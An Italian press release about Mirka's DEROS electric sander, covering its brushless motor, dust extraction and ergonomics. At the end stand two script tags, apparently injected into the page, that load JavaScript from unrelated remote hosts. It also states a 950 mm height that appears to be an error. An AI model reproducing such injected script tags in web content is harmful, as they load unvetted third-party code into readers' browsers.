La levigatrice rotorbitale elettrica a trasmissione diretta MIRKA DEROS, combinata con un sistema di aspirazione della polvere, assicura agli operatori un ambiente di lavoro più pulito, maggior controllo sul lavoro e una qualità più elevata della rifinitura, il tutto praticamente senza polvere. Grazie al nuovo tipo di platorello, dotato di un foro di aspirazione centrale incorporato, il flusso d'aria risulta migliorato e la polvere viene estratta dalla parte centrale dello strumento in modo rapido ed efficiente.
Mirka è specializzata nello sviluppo di tecnologie e brevetti nel settore degli abrasivi e offre ai clienti un processo di finitura delle superfici praticamente senza polvere. La nostra azienda vanta una vasta gamma di prodotti di levigatura e lucidatura a complemento dei sistemi in portafoglio. La levigatrice MIRKA DEROS è il frutto dell'innovazione e della tecnologia Mirka. MIRKA DEROS è prodotta in Finlandia
Veloce ed efficiente
Grazie al motore senza spazzole brevettato, la levigatrice MIRKA DEROS dispone di tutta la potenza necessaria per svolgere il lavoro in modo rapido ed efficiente.
- Le prestazioni offerte sono realmente comparabili a quelle di un apparecchio elettrico convenzionale da 500 W e ciò garantisce il mantenimento di una velocità costante anche sotto sforzo, ha dichiarato Mats Bystedt, responsabile del settore commerciale di Mirka.
Riducendo le operazioni di pulizia da effettuare dopo il completamento della levigatura, la levigatrice rotorbitale elettrica a trasmissione diretta combinata con gli abrasivi "Net" di Mirka può realmente velocizzare di almeno il 20% le operazioni di imbiancatura, ristrutturazione e simili, rispetto all'uso dei metodi e degli apparecchi di levigatura tradizionali. A sua volta questo permette di tagliare sui costi.
La progettazione del motore con tecnologia "brushless", inoltre, comporta un minor numero di componenti soggetti a usura. L'apparecchio richiede quindi poca manutenzione, è estremamente affidabile e offre una durata superiore.
- Rispetto alle macchine elettriche tradizionali, MIRKA DEROS presenta una struttura stagna che blocca l'ingresso della polvere nel motore ed evita conseguenti usura e danni, ha sottolineato il signor Bystedt.
L'attenzione al particolare
La nuova levigatrice include diverse e preziose caratteristiche, quali la funzione di avvio progressivo, il freno motore elettrico incorporato e una leva morbida e di semplice utilizzo per il controllo della velocità del motore. Il cavo di alimentazione, inoltre, può essere tolto o sostituito.
Come tutti gli apparecchi Mirka, anche MIRKA DEROS è stata progettata all'insegna della semplicità di utilizzo. Grazie alla speciale ergonomia del prodotto, la macchina può essere utilizzata per tempi prolungati senza fatica.
- Ad esempio, l'apparecchio offre maggior controllo e una presa più comoda grazie allo spazio extra per anulare e mignolo. L’esclusivo design simmetrico la rende comoda da usare sia con la destra che con la sinistra, mentre il corpo allungato permette di afferrare l'apparecchio con entrambe le mani. Non avendo alimentatore, inoltre, la macchina offre un'elevata flessibilità di manovra, ha dichiarato Bystedt.
L'apparecchio è inoltre estremamente compatto. Con soli 950 mm di altezza e 1 kg di peso, la macchina ha circa la metà dell'ingombro e del peso delle levigatrici elettriche tradizionali disponibili sul mercato.
- Il lavoro diventa così molto più agevole, in particolare gli interventi sulle superfici verticali come le pareti.
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script><script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&d=2012-10-16&s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script>